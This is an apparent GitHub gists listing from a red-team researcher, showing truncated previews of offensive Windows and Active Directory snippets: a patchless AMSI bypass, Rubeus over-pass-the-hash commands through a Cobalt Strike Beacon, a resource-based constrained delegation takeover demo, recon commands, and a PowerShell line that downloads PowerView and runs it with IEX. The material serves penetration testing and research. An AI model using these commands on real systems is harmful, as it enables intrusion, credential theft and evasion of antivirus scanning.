Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
geeking out about Kerberos

Will HarmJ0y

💭
geeking out about Kerberos
View GitHub Profile
@HarmJ0y
HarmJ0y / patchless_amsi.h
Created May 13, 2022 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
View patchless_amsi.h
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@HarmJ0y
HarmJ0y / dc_cert_template.ps1
Created Sep 13, 2021
DC Certificate Template Enumeration
View dc_cert_template.ps1
$Results = ([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll() | % {
$Entry = $_.GetDirectoryEntry()
$SAM = $Entry.samAccountName[0]
$DN = $Entry.distinguishedName[0]
try {
$Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($Entry.userCertificate)
$Exp = $Cert.GetExpirationDateString()
@HarmJ0y
HarmJ0y / Jenkinsfile
Created Nov 2, 2020
Rubeus Jenkinsfile
View Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL: https://github.com/GhostPack/Seatbelt
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = "https://github.com/GhostPack/Seatbelt"
@HarmJ0y
HarmJ0y / rbcd_demo.ps1
Last active Jun 9, 2022
Resource-based constrained delegation computer DACL takeover demo
View rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@HarmJ0y
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Jun 17, 2022
Over-pass-the-hash with Rubeus and Beacon
View gist:dc379107cfb4aa7ef5c3ecbac0133a02
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@HarmJ0y
HarmJ0y / New-SYSVOLZip.ps1
Created Aug 8, 2017
Compresses all of SYSVOL to a local .zip file.
View New-SYSVOLZip.ps1
function New-SYSVOLZip {
<#
.SYNOPSIS
Compresses all folders/files in SYSVOL to a .zip file.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View DPAPI.ps1
Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Jun 28, 2022
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View Get-NonstandardService.ps1
function Get-NonstandardService {
<#
.SYNOPSIS
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None